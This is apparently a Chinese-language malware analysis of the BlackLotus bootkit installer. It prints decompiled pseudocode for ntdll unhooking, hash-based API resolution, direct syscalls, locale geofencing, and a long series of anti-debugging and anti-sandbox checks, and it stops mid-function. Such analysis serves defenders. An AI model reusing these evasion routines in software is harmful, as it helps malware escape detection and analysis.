BlackLotus 分析1--安装器阶段
BlackLotus 分析1--安装器阶段
目录
文件信息
BlackLotus installer.
sha1 :a5a530a91100ed5f07a5d74698b15c646dd44e16
start
__int64 start()
{
//ThreadHideFromDebugger 反调试
NtSetInformationThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, ThreadHideFromDebugger, 0i64, 0);
if ( isBeingDebugged() )//NtCurrentPeb()->BeingDebugged
MEMORY[0] = 0x4E8C;
init_ntdll();//初始化api
if ( (unsigned int)is_default_locale_banned()//判断地区
|| isBeingDebugged()
|| check_NtGlobalFlag_1400014B0()//(NtCurrentPeb()->NtGlobalFlag & 0x70) != 0;
|| is_being_debugged_ntqueryinformationprocess()//ProcessDebugPort(7) ProcessDebugObjectHandle(0x1e) ProcessDebugFlags(0x1f)
|| (unsigned int)is_kernel_debugger_present()//SystemKernelDebuggerInformation 0x23
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int3()
|| (unsigned int)is_being_debugged_by_vectored_exception_handler_int2d()
|| (unsigned int)anti_sandbox_check_loaded_dlls_basename()
|| (unsigned int)anti_sandbox_check_loaded_dlls_fullname()
|| (unsigned int)anti_sandbox_check_processes_running()
|| (unsigned int)anti_sandbox_check_registry_key_present()
|| (unsigned int)anti_sandbox_check_registry_values()
|| (unsigned int)anti_sandbox_check_RSMB()
|| (unsigned int)anti_sandbox_check_ACPI()
|| (unsigned int)anti_sandbox_check_mac_addr()
|| (unsigned int)anti_sandbox_rdtsc() )
{
MEMORY[0] = 0x4E8C;
}
else
{
init_other_imports();
if ( is_at_least_il_high() ) // SECURITY_MANDATORY_HIGH_RID
install_bootkit_main();
else
do_uac_bypass();
}
NtTerminateProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, 0x69);
return 0x69i64;
}
init_ntdll
动态加载nt api
void __stdcall init_ntdll()
{
struct _IMAGE_DOS_HEADER *ntdll_and_unhook; // rbx
ntdll_and_unhook = get_ntdll_and_unhook(0xD22E2014);
LdrGetProcedureAddress_14026B020 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xB08469DD,
0);
RtlInitUnicodeString_14026B000 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xC8D8F9F4,
0);// <ntdll.RtlInitUnicodeString>
LdrLoadDll_14026B008 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.LdrLoadDll>
ntdll_and_unhook,
0xF6CFC604,
0);
RtlAllocateHeap_14026B010 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.RtlAllocateHeap>
ntdll_and_unhook,
0x572D53D3u,
0);
RtlFreeHeap_14026B018 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD))get_proc_address_by_hash(// <ntdll.RtlFreeHeap>
ntdll_and_unhook,
0x10DE9522u,
0);
RtlRemoveVectoredExceptionHandler_14026B030 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xBB26CCEB,
0);// RtlRemoveVectoredExceptionHandler
RtlAddVectoredExceptionHandler_14026B028 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0x89AB8454,
0);// <ntdll.RtlAddVectoredExceptionHandler>
wcsstr_14026B038 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(ntdll_and_unhook, 0xB2AECB6A, 0);// <ntdll.wcsstr>
EtwEventWriteNoRegistration_14026B0E0 = (__int64 (__fastcall *)(_QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD, _QWORD))get_proc_address_by_hash(ntdll_and_unhook, 0xF0238EA7, 0);// <ntdll.EtwEventWriteNoRegistration>
itow_14026B160 = (__int64)get_proc_address_by_hash(ntdll_and_unhook, 0x839101F2, 0);// <ntdll._itow>
RtlSubAuthoritySid_14026B170 = (__int64 (__fastcall *)(_QWORD, _QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0x319CEA81u,
0);// <ntdll.RtlSubAuthoritySid>
RtlSubAuthorityCountSid_14026B178 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xC96D110C,
0);// <ntdll.RtlSubAuthorityCountSid>
RtlIdentifierAuthoritySid_14026B168 = (__int64 (__fastcall *)(_QWORD))get_proc_address_by_hash(
ntdll_and_unhook,
0xEF508FEu,
0);// <ntdll.RtlIdentifierAuthoritySid>
}
get_ntdll_and_unhook
PIMAGE_DOS_HEADER __fastcall get_ntdll_and_unhook(DWORD a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
FileHandle = 0i64;
Handle = 0i64;
v19 = 0i64;
v16 = 0i64;
Count = 0i64;
if ( is_being_debugged_ntqueryinformationprocess() )
MEMORY[0] = 0x4E8C;
dll_base = get_dll_base(a1, (PCWSTR *)&Count);
p_e_magic = &dll_base->e_magic;
if ( dll_base && Count )
{
v4 = (_IMAGE_NT_HEADERS64 *)((char *)dll_base + dll_base->e_lfanew);
v5 = deobfuscate_wstring(path_prefix_14000AA98, 5u, 1);// rax:L"\\??\\"
v6 = 0x108i64;
v7 = Destination;
v8 = (char *)v5 - (char *)Destination;
do
{
if ( v6 == 0xFFFFFFFF8000010Aui64 )
break;
v9 = *(wchar_t *)((char *)v7 + v8);
if ( !v9 )
break;
*v7++ = v9;
--v6;
}
while ( v6 );
v10 = v7 + 0xFFFFFFFF;
if ( v6 )
v10 = v7;
v11 = (const wchar_t *)Count;
*v10 = 0;
wcsncat(Destination, 0x108ui64, v11); // \??\C:\Windows\SYSTEM32\ntdll.dll
v20.Buffer = Destination;
v20.Length = 2 * wcslen_1400058DC(Destination);
ObjectAttributes.Length = 0x30;
ObjectAttributes.RootDirectory = 0i64;
v20.MaximumLength = 2 * (wcslen_1400058DC(Destination) + 1);
ObjectAttributes.Attributes = 0x40;
ObjectAttributes.ObjectName = &v20;
*(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
if ( NtCreateFile(&FileHandle, 1u, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0x40u, 0i64, 0) >= 0
&& NtCreateSection(&Handle, 0xF001Fu, 0i64, 0i64, 2u, 0x1000000u, FileHandle) >= 0
&& (int)NtMapViewOfSection(Handle, 0xFFFFFFFFFFFFFFFFui64, &v16, 0i64, 0i64, 0i64, &v19, 1, 0, 2) >= 0
&& *p_e_magic == 0x5A4D )
{
v12 = 0;
if ( v4->FileHeader.NumberOfSections )
{ // copy .text
// 0x28-->sizeof(struct IMAGE_SECTION_HEADER SectionHeaders)
while ( 1 )
{
v13 = (__int64)v4 + 0x28 * v12 + v4->FileHeader.SizeOfOptionalHeader;
// 0x18-->
// DWORD Signature (0x4)
// struct IMAGE_FILE_HEADER FileHeader (0x14)
if ( (unsigned int)s_hash_0x1003F_1400058B8((_BYTE *)(v13 + 0x18)) == 0x7BC3E49B )// .text
// struct IMAGE_SECTION_HEADER SectionHeaders
// Name[8]
break;
if ( ++v12 >= v4->FileHeader.NumberOfSections )
goto LABEL_20;
}
OldAccessProtection = 0;
BaseAddress = (char *)p_e_magic + *(unsigned int *)(v13 + 0x24);// +0xc DWORD VirtualAddress
NumberOfBytesToProtect = *(unsigned int *)(v13 + 0x20);// +0x8 DWORD VirtualSize
NtProtectVirtualMemory(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
&NumberOfBytesToProtect,
0x40u,
&OldAccessProtection);
memcpy_140001024(
(char *)p_e_magic + *(unsigned int *)(v13 + 0x24),
(char *)v16 + *(unsigned int *)(v13 + 0x24),
*(unsigned int *)(v13 + 0x20));
NtProtectVirtualMemory(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
&BaseAddress,
&NumberOfBytesToProtect,
OldAccessProtection,
&OldAccessProtection);
}
}
}
LABEL_20:
if ( FileHandle )
NtClose(FileHandle);
if ( Handle )
NtClose(Handle);
if ( v16 )
NtUnmapViewOfSection((HANDLE)0xFFFFFFFFFFFFFFFFi64, v16);
return get_dll_base(a1, 0i64);
}
get_proc_address_by_hash
void *__fastcall get_proc_address_by_hash(PIMAGE_DOS_HEADER base, DWORD hash, unsigned __int16 ordinal)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
hash1 = hash;
v5 = 0;
func = 0i64;
v32 = 0i64;
memset_140001000(v31, 0, 0x208ui64);
v7 = 0x104i64;
memset_140001000(v30, 0, 0x104ui64);
if ( base )
{
if ( base->e_magic == 0x5A4D )
{
v8 = (_IMAGE_NT_HEADERS64 *)((char *)base + base->e_lfanew);
if ( v8->Signature == 0x4550 )
{
if ( v8->OptionalHeader.DataDirectory[0].Size )
{
v9 = (_IMAGE_EXPORT_DIRECTORY *)((char *)base + v8->OptionalHeader.DataDirectory[0].VirtualAddress);
NameOrdinals = (WORD *)((char *)&base->e_magic + v9->AddressOfNameOrdinals);
Names = (char **)((char *)base + v9->AddressOfNames);
Names1 = Names;
if ( hash1 )
{
v13 = 0;
if ( !v9->NumberOfNames )
return (void *)func;
while ( 1 )
{
v14 = s_hash_0x1003F_1400058B8((_BYTE *)base + *((unsigned int *)Names + v13));
if ( v14 == hash1 )
break;
Names = Names1;
if ( ++v13 >= v9->NumberOfNames )
{
func = v32;
goto LABEL_15;
}
}
Functions = *(unsigned int *)((char *)&base->e_magic + 4 * NameOrdinals[v13] + v9->AddressOfFunctions);
}
else
{
v11 = v9->Base;
if ( ordinal < v11 || ordinal >= v11 + v9->NumberOfFunctions )
return (void *)func;
Functions = *(_QWORD *)((char *)&base->e_magic + 8 * (ordinal - v11) + v9->AddressOfFunctions);
}
func = (unsigned __int64)base + Functions;
v32 = func;
LABEL_15:
if ( func
&& func >= (unsigned __int64)v9
&& func < (unsigned __int64)v9 + v8->OptionalHeader.DataDirectory[0].Size )
{
// 函数转发的情况
v15 = *(_BYTE *)func; // <module>.<functionname>
LODWORD(v16) = 0;
if ( *(_BYTE *)func != 0x2E )
{
v17 = 0i64;
do
{
v16 = (unsigned int)(v16 + 1);
v31[v17] = v15;
v17 = (unsigned int)v16;
v15 = *(_BYTE *)(v16 + func);
}
while ( v15 != 0x2E );
}
ws_tolittle_1400059D8(v31, (__int64)v31);
v18 = wcslen_1400058DC(v31);
v19 = v30;
v20 = func + v18 + 1i64 - (_QWORD)v30;
do
{
if ( v7 == 0xFFFFFFFF80000106ui64 )
break;
v21 = v19[v20];
if ( !v21 )
break;
*v19++ = v21;
--v7;
}
while ( v7 );
v22 = v19 + 0xFFFFFFFF;
if ( v7 )
v22 = v19;
*v22 = 0;
library_w = load_library_w(v31);
v24 = library_w;
// api-
// ext-
if ( *(_DWORD *)func == '-ipa' || *(_DWORD *)func == '-txe' )
{
if ( library_w )
{
v29 = v30;
v28[0] = strlen_1400058F4(v30);
v28[1] = v28[0] + 1;
LdrGetProcedureAddress_14026B020(v24, v28, 0i64, &v32);
return (void *)v32;
}
else
{
return 0i64;
}
}
else
{
if ( v30[0] == '#' )
{
v25 = 0;
v5 = atoi_140005954(&v30[1]);
}
else
{
v25 = s_hash_0x1003F_1400058B8(v30);
}
return get_proc_address_by_hash(v24, v25, v5);
}
}
}
}
}
}
return (void *)func;
}
s_hash_0x1003F_1400058B8
__int64 __fastcall s_hash_0x1003F_1400058B8(_BYTE *a1)
{
__int64 result; // rax
result = 0i64;
if ( a1 )
{
while ( *a1 )
result = (unsigned int)((char)*a1++ + 0x1003F * result);
}
return result;
}
is_default_locale_banned
https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-LCID/[MS-LCID].pdf
__int64 is_default_locale_banned()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0;
v4 = 0;
if ( NtQueryDefaultLocale(0, &v4) < 0 )
return 0i64;
v1 = v4 - 0x419;
if ( (unsigned int)v1 <= 0x26 )
{
// 0x0419 ru-RU
// 0x041A hr-HR
// 0x041B sk-SK
// 0x041C sq-AL
// 0x041D sv-SE
// 0x041E th-TH
// 0x041F tr-TR
// 0x0420 ur-PK
// 0x0421 id-ID
// 0x0422 uk-UA
// 0x0423 be-BY
// 0x0424 sl-SI
// 0x0425 et-EE
// 0x0426 lv-LV
// 0x0427 lt-LT
// 0x0428 tg-Cyrl-TJ
// 0x0429 fa-IR
// 0x042A vi-VN
// 0x042B hy-AM
// 0x042C az-Latn-AZ
// 0x042D eu-ES
// 0x042E hsb-DE
// 0x042F mk-MK
// 0x0430 st-ZA
// 0x0431 ts-ZA
// 0x0432 tn-ZA
// 0x0433 ve-ZA
// 0x0434 xh-ZA
// 0x0435 zu-ZA
// 0x0436 af-ZA
// 0x0437 ka-GE
// 0x0438 fo-FO
// 0x0439 hi-IN
// 0x043A mt-MT
// 0x043B se-NO
// 0x043D yi-001
// 0x043E ms-MY
// 0x043F kk-KZ
v2 = 0x4000040601i64;
if ( _bittest64(&v2, v1) ) // 0x4000040601
// 0100000000000000000001000000011000000001
return 1i64; // 1049 ru-RU Russia
// 1058 uk-UA Ukraine
// 1059 be-BY Belarus
// 1067 hy-AM Armenia
}
if ( v4 == 0x818 ) // 0x0818 ro-MD Moldova
return 1i64;
LOBYTE(v0) = v4 == 0x819; // 0x0819 ru-MD Moldova
return v0;
}
反调试
1、NtSetInformationThread
//ThreadHideFromDebugger
NTSTATUS __stdcall NtSetInformationThread(
HANDLE ThreadHandle,
THREADINFOCLASS ThreadInformationClass,
PVOID ThreadInformation,
ULONG ThreadInformationLength)
{
NTSTATUS result; // eax
result = get_syscall_numb_140002DCC(0x2ED76231);
__asm { syscall; Low latency system call }
return result;
}
get_syscall_numb_140002DCC
__int64 __fastcall get_syscall_numb_140002DCC(int a1)
{
unsigned int v2; // edi
unsigned int v3; // ebx
unsigned int v4; // eax
unsigned int v5; // ecx
v2 = 0xFFFFFFFF;
v3 = 0;
if ( check_NtGlobalFlag_1400014B0() )
MEMORY[0] = 0x4E8C;
v4 = ntfunc_hashs_1402684E0[0];
if ( ntfunc_hashs_1402684E0[0]
|| (unsigned int)get_ntfunc_hashs_140002C58((unsigned int *)ntfunc_hashs_1402684E0)
&& (v4 = ntfunc_hashs_1402684E0[0]) != 0 )
{
do
{
v5 = v3;
if ( a1 != ntfunc_hashs_1402684E0[4 * v3 + 2] )
v5 = v2;
++v3;
v2 = v5;
}
while ( v3 < v4 );
}
return v2;
}
get_ntfunc_hashs_140002C58
__int64 __fastcall get_ntfunc_hashs_140002C58(unsigned int *a1)
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v2 = 0;
v3 = 0;
dll_base = (__int64)get_dll_base(0xD22E2014, 0i64);// 0xD22E2014-->ntdll
if ( dll_base )
{
if ( *(_WORD *)dll_base == 0x5A4D )
{
v5 = (_IMAGE_NT_HEADERS64 *)*(int *)(dll_base + 0x3C);
if ( *(DWORD *)((char *)&v5->Signature + dll_base) == 0x4550 )
{
if ( *(DWORD *)((char *)&v5->OptionalHeader.DataDirectory[0].Size + dll_base) )
{
v6 = (_IMAGE_EXPORT_DIRECTORY *)(dll_base
+ *(unsigned int *)((char *)&v5->OptionalHeader.DataDirectory[0].VirtualAddress
+ dll_base));
v7 = dll_base + v6->AddressOfFunctions;
v8 = dll_base + v6->AddressOfNames;
NumberOfNames = v6->NumberOfNames;
v10 = dll_base + v6->AddressOfNameOrdinals;
do
{
v11 = (_BYTE *)(dll_base + *(unsigned int *)(v8 + 4i64 * --NumberOfNames));
if ( *(_WORD *)v11 == 'wZ' ) // Zw
{
v12 = 2i64 * v3;
a1[4 * v3++ + 2] = s_hash_0x1003F_1400058B8(v11);
*(_QWORD *)&a1[2 * v12 + 4] = *(unsigned int *)(v7
+ 4i64 * *(unsigned __int16 *)(v10 + 2i64 * NumberOfNames));
if ( v3 == 500 )
break;
}
}
while ( NumberOfNames );
v13 = 0;
*a1 = v3;
v2 = v3;
if ( v3 != 1 )
{
do
{
v14 = 0;
v15 = v3;
if ( v3 - v13 != 1 )
{
do
{
v16 = v14 + 1;
v17 = 2i64 * v14;
v18 = 2i64 * (v14 + 1);
v19 = *(_QWORD *)&a1[4 * v14 + 4];
v20 = *(_QWORD *)&a1[4 * v14 + 8];
if ( v19 > v20 )
{
v21 = a1[4 * v14 + 2];
a1[2 * v17 + 2] = a1[2 * v18 + 2];
a1[2 * v18 + 2] = v21;
*(_QWORD *)&a1[2 * v17 + 4] = v20;
*(_QWORD *)&a1[2 * v18 + 4] = v19;
}
v3 = *a1;
v14 = v16;
}
while ( v16 < *a1 - v13 - 1 );
v15 = *a1;
}
++v13;
}
while ( v13 < v15 - 1 );
}
}
}
}
}
return v2;
}
2、isBeingDebugged
int isBeingDebugged(void)
{
return NtCurrentPeb()->BeingDebugged != 0;
}
3、check_NtGlobalFlag
_BOOL8 check_NtGlobalFlag_1400014B0()
{
return (NtCurrentPeb()->NtGlobalFlag & 0x70) != 0;
}
4、is_being_debugged_ntqueryinformationprocess
DWORD __stdcall is_being_debugged_ntqueryinformationprocess()
{
DWORD v0; // ebx
int v2; // [rsp+40h] [rbp+8h] BYREF
__int64 ProcessInformation; // [rsp+48h] [rbp+10h] BYREF
v0 = 0;
v2 = 0;
ProcessInformation = 0i64;
if ( NtQueryInformationProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, ProcessDebugPort, &v2, 4u, 0i64) >= 0 && v2 )
v0 = 1;
if ( NtQueryInformationProcess(
(HANDLE)0xFFFFFFFFFFFFFFFFi64,
ProcessWow64Information|0x4, // 0x1e-->ProcessDebugObjectHandle
&ProcessInformation,
8u,
0i64) >= 0
&& ProcessInformation )
{
v0 = 1;
}
if ( NtQueryInformationProcess((HANDLE)0xFFFFFFFFFFFFFFFFi64, ProcessBreakOnTermination|0x2, &v2, 4u, 0i64) >= 0// 0x1f-->ProcessDebugFlags
&& !v2 )
{
return 1;
}
return v0;
}
5、is_kernel_debugger_present
__int64 is_kernel_debugger_present()
{
unsigned int v0; // ebx
char SystemInformation; // [rsp+30h] [rbp+8h] BYREF
char v3; // [rsp+31h] [rbp+9h]
v0 = 0;
if ( NtQuerySystemInformation(SystemExceptionInformation|SystemPerformanceInformation, &SystemInformation, 2u, 0i64) >= 0// SystemKernelDebuggerInformation 0x23
&& (SystemInformation || !v3) )
{
return 1;
}
return v0;
}
6、is_being_debugged_by_vectored_exception_handler_int3
__int64 is_being_debugged_by_vectored_exception_handler_int3()
{
unsigned int v0; // ebx
__int64 v1; // rax
v0 = 1;
v1 = RtlAddVectoredExceptionHandler_14026B028(1i64, VectoredHandler_1400020D0);
gisDebugger_14000C000 = 1;
if ( v1 )
{
__debugbreak();
RtlRemoveVectoredExceptionHandler_14026B030(v1);
return (unsigned int)gisDebugger_14000C000;
}
return v0;
}
7、is_being_debugged_by_vectored_exception_handler_int2d
__int64 is_being_debugged_by_vectored_exception_handler_int2d()
{
unsigned int v0; // ebx
__int64 v1; // rax
__int64 v2; // rdi
v0 = 1;
v1 = RtlAddVectoredExceptionHandler_14026B028(1i64, VectoredHandler_1400020D0);
gisDebugger_14000C000 = 1;
v2 = v1;
if ( v1 )
{
_int2d_1400084C0();// __asm { int 2Dh; Windows NT - debugging services: eax = type }
RtlRemoveVectoredExceptionHandler_14026B030(v2);
return (unsigned int)gisDebugger_14000C000;
}
return v0;
}
反沙箱
al-khaser/Generic.cpp at master · LordNoteworthy/al-khaser (github.com)
1、anti_sandbox_check_loaded_dlls_basename
__int64 anti_sandbox_check_loaded_dlls_basename()
{
unsigned int v0; // ebx
unsigned int v1; // edi
DWORD *v2; // rsi
_DWORD v4[14]; // [rsp+20h] [rbp-38h] BYREF
// avghookx.dll:0x98C500D9
// avghooka.dll:0x7E8877C2
// snxhk.dll:0x3E0169B6
// sbiedll.dll:0x1E7EACEF
// dbghelp.dll:0x4468A620
// api_log.dll:0x68536B95
// dir_watch.dll:0x73EBBB53
// pstorec.dll:0xDA165168
// vmcheck.dll:0xB24D33A7
// wpespy.dll:0xB1E2CEC6
// cmdvrt64.dll:0x05136992
// cmdvrt32.dll:0x3AB587D3
v0 = 0;
v4[0] = 0x1E7EACEF; // sbiedll.dll
v1 = 0;
v4[1] = 0x4468A620; // dbghelp.dll
v4[2] = 0x68536B95; // api_log.dll
v2 = v4;
v4[3] = 0x73EBBB53; // dir_watch.dll
v4[4] = 0xDA165168; // pstorec.dll
v4[5] = 0xB24D33A7; // vmcheck.dll
v4[6] = 0xB1E2CEC6; // wpespy.dll
v4[7] = 0x5136992; // cmdvrt64.dll
v4[8] = 0x98C500D9; // avghookx.dll
v4[9] = 0x3E0169B6; // snxhk.dll
while ( !get_dll_base(*v2, 0i64) )
{
++v1;
++v2;
if ( v1 >= 0xA )
return v0;
}
return 1;
}
2、anti_sandbox_check_loaded_dlls_fullname
__int64 anti_sandbox_check_loaded_dlls_fullname()
{
unsigned int v0; // ebx
int v1; // edx
int *v2; // rax
unsigned int v3; // ecx
int v5[10]; // [rsp+20h] [rbp-28h] BYREF
// sample.exe 0x7D73878E
// bot.exe 0xEF36424B
// sandbox.exe 0xAF64BC2B
// malware.exe 0x1DBBC879
// test.exe 0xAE6D1D56
// klavme.exe 0x7B3242F2
// myapp.exe 0x14D922B9
// testapp.exe 0x4C92DF53
v0 = 0;
v1 = ws_hash_0x1003F_140005894(NtCurrentPeb()->Ldr->InMemoryOrderModuleList.Flink[5].Flink);
v5[0] = 0x7D73878E; // sample.exe
v2 = v5;
v5[1] = 0xEF36424B; // bot.exe
v5[2] = 0xAF64BC2B; // sandbox.exe
v3 = 0;
v5[3] = 0x1DBBC879; // malware.exe
v5[4] = 0xAE6D1D56; // test.exe
v5[5] = 0x7B3242F2; // klavme.exe
v5[6] = 0x14D922B9; // myapp.exe
v5[7] = 0x4C92DF53; // testapp.exe
while ( v1 != *v2 )
{
++v3;
++v2;
if ( v3 >= 8 )
return v0;
}
return 1;
}
3、anti_sandbox_check_processes_running
__int64 anti_sandbox_check_processes_running()
{
unsigned int v0; // ebx
unsigned int v1; // edi
int *v2; // rsi
int v4[16]; // [rsp+20h] [rbp-40h] BYREF
v0 = 0;
// vmtoolsd.exe 0xB8B9C504
// vmwaretray.exe 0x69A0620E
// vmwareuser.exe 0x6017EE43
// VGAuthService.exe 0xE93BE2E0
// vmacthlp.exe 0x149EFC55
// VMSrvc.exe 0x5B098C67
// VMUSrvc.exe 0x2F1FB18E
// qemu-ga.exe 0x861E460F
// xenservice.exe 0xFE8F2B18
// prl_cc.exe 0x42D12D59
// prl_tools.exe 0x0EC5D7AA
// vboxservice.exe 0xE3FA84A4
// vboxtray.exe 0x7CFDD7AF
v4[0] = 0x42D12D59; // prl_cc.exe
v1 = 0;
v4[1] = 0xEC5D7AA; // prl_tools.exe
v4[2] = 0x861E460F; // qemu-ga.exe
v2 = v4;
v4[3] = 0x84BCC8DB;
v4[4] = 0x6474D72B;
v4[5] = 0xB8B9C504; // vmtoolsd.exe
v4[6] = 0x69A0620E; // vmwaretray.exe
v4[7] = 0x6017EE43; // vmwareuser.exe
v4[8] = 0xE93BE2E0; // VGAuthService.exe
v4[9] = 0x149EFC55; // vmacthlp.exe
v4[0xA] = 0xE3FA84A4; // vboxservice.exe
v4[0xB] = 0x7CFDD7AF; // vboxtray.exe
v4[0xC] = 0x5B098C67; // VMSrvc.exe
v4[0xD] = 0x2F1FB18E; // VMUSrvc.exe
v4[0xE] = 0xFE8F2B18; // xenservice.exe
while ( !get_process_pid_140005F1C(*v2) )
{
++v1;
++v2;
if ( v1 >= 0xF )
return v0;
}
return 1;
}
4、anti_sandbox_check_registry_key_present
__int64 anti_sandbox_check_registry_key_present()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0;
v6[0] = 0x46;
v6[2] = 0x42;
v1 = (WORD **)v7;
v6[5] = 0x3F;
v2 = (unsigned int *)v6;
v6[7] = 0x35;
v3 = 0;
v6[0xE] = 0x3C;
v6[1] = 0x38;
v6[4] = 0x38;
v6[3] = 0x3D;
v6[8] = 0x2C;
v6[9] = 0x2C;
v6[0xA] = 0x2C;
v6[0xC] = 0x3A;
v6[0xD] = 0x3A;
v6[0x10] = 0x3A;
v7[0] = (__int64)word_140009340;
v7[1] = (__int64)word_1400093D0;
v7[2] = (__int64)word_140009450;
v7[3] = (__int64)word_1400094E0;
v7[4] = (__int64)word_140009560;
v7[5] = (__int64)word_1400095E0;
v7[6] = (__int64)word_140009660;
v7[7] = (__int64)word_1400096D0;
v7[8] = (__int64)word_140009740;
v7[9] = (__int64)word_1400097A0;
v7[0xA] = (__int64)word_140009800;
v7[0xB] = (__int64)word_140009860;
v7[0xC] = (__int64)word_1400098E0;
v7[0xD] = (__int64)word_140009960;
v7[0xE] = (__int64)word_1400099E0;
v7[0xF] = (__int64)word_140009A60;
v7[0x10] = (__int64)word_140009AD0;
v6[6] = 0x37;
v6[0xB] = 0x3D;
v6[0xF] = 0x37;
// \Registry\Machine\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters
// \Registry\Machine\SYSTEM\ControlSet001\Services\vioscsi
// \Registry\Machine\SYSTEM\ControlSet001\Services\VirtIO-FS Service
// \Registry\Machine\SYSTEM\ControlSet001\Services\VirtioSerial
// \Registry\Machine\SYSTEM\ControlSet001\Services\BALLOON
// \Registry\Machine\SYSTEM\ControlSet001\Services\BalloonService
// \Registry\Machine\SYSTEM\ControlSet001\Services\netkvm
// \Registry\Machine\SOFTWARE\VMware, Inc.\VMware Tools
// \Registry\Machine\HARDWARE\ACPI\DSDT\VBOX__
// \Registry\Machine\HARDWARE\ACPI\FADT\VBOX__
// \Registry\Machine\HARDWARE\ACPI\RSDT\VBOX__
// \Registry\Machine\SOFTWARE\Oracle\VirtualBox Guest Additions
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxGuest
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxMouse
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxService
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxSF
// \Registry\Machine\SYSTEM\ControlSet001\Services\VBoxVideo
while ( 1 )
{
v4 = deobfuscate_wstring(*v1, *v2, 1);
RtlInitUnicodeString_14026B000(v8, v4);
v9.Length = 0x30;
v9.ObjectName = (PUNICODE_STRING)v8;
v9.RootDirectory = 0i64;
v9.Attributes = 0x40;
*(_OWORD *)&v9.SecurityDescriptor = 0i64;
if ( NtOpenKey(&Handle, 0x20019u, &v9) >= 0 )
break;
++v3;
++v2;
++v1;
if ( v3 >= 0x11 )
return v0;
}
v0 = 1;
NtClose(Handle);
return v0;
}
5、anti_sandbox_check_registry_values
__int64 anti_sandbox_check_registry_values()
{
// [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]
v0 = 0;
v12 = 0;
// \Registry\Machine\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0
v8[0] = (__int64)deobfuscate_wstring(word_1400090F0, 0x5Fu, 1);
// \Registry\Machine\SYSTEM\ControlSet001\Control\SystemInformation
v8[1] = (__int64)deobfuscate_wstring(word_1400091B0, 0x41u, 0);
// \Registry\Machine\HARDWARE\Description\System
v8[2] = (__int64)deobfuscate_wstring(word_140009240, 0x2Eu, 0);
// Identifier
v9[0] = (__int64)deobfuscate_wstring(word_1400092A0, 0xBu, 0);
// SystemManufacturer
v9[1] = (__int64)deobfuscate_wstring(word_1400092B8, 0x13u, 0);
// SystemBiosVersion
v9[2] = (__int64)deobfuscate_wstring(word_1400092E0, 0x12u, 0);
// VMWARE
v1 = deobfuscate_wstring(word_140009308, 7u, 0);
// QEMU
v2 = deobfuscate_wstring(word_140009318, 5u, 0);
// VBOX
v14 = deobfuscate_wstring(word_140009328, 5u, 0);
v3 = 0;
for ( i = 0i64; ; ++i )
{
RtlInitUnicodeString_14026B000(v10, v8[i]);
v11.Length = 0x30;
v11.ObjectName = (PUNICODE_STRING)v10;
v11.RootDirectory = 0i64;
v11.Attributes = 0x40;
*(_OWORD *)&v11.SecurityDescriptor = 0i64;
if ( NtOpenKey(&Handle, 0x20019u, &v11) >= 0 )
break;
LABEL_12:
if ( (unsigned int)++v3 >= 3 )
return v0;
}
RtlInitUnicodeString_14026B000(&v7, v9[i]);
NtQueryValueKey(Handle, &v7, KeyValuePartialInformation, 0i64, 0, &v12);
Heap_14026B010 = (_DWORD *)RtlAllocateHeap_14026B010(NtCurrentPeb()->ProcessHeap, 8i64, v12);
if ( !Heap_14026B010 )
{
LABEL_11:
NtClose(Handle);
goto LABEL_12;
}
if ( NtQueryValueKey(Handle, &v7, KeyValuePartialInformation, Heap_14026B010, v12, &v12) < 0
|| Heap_14026B010[1] != 1 && Heap_14026B010[1] != 7
|| !wcsstr_14026B038(Heap_14026B010 + 3, v1)
&& !wcsstr_14026B038(Heap_14026B010 + 3, v2)
&& !wcsstr_14026B038(Heap_14026B010 + 3, v14) )
{
RtlFreeHeap_14026B018(NtCurrentPeb()->ProcessHeap, 0i64, Heap_14026B010);
goto LABEL_11;
}
return 1;
}
6、anti_sandbox_check_RSMB
__int64 anti_sandbox_check_RSMB()
{
unsigned int v0; // ebx
SYSTEM_FIRMWARE_TABLE_INFORMATION *SystemFirmwareTableInformation; // rdi
BYTE *TableBuffer; // rsi
BYTE *v3; // rax
BYTE *v4; // rax
BYTE *v5; // rax
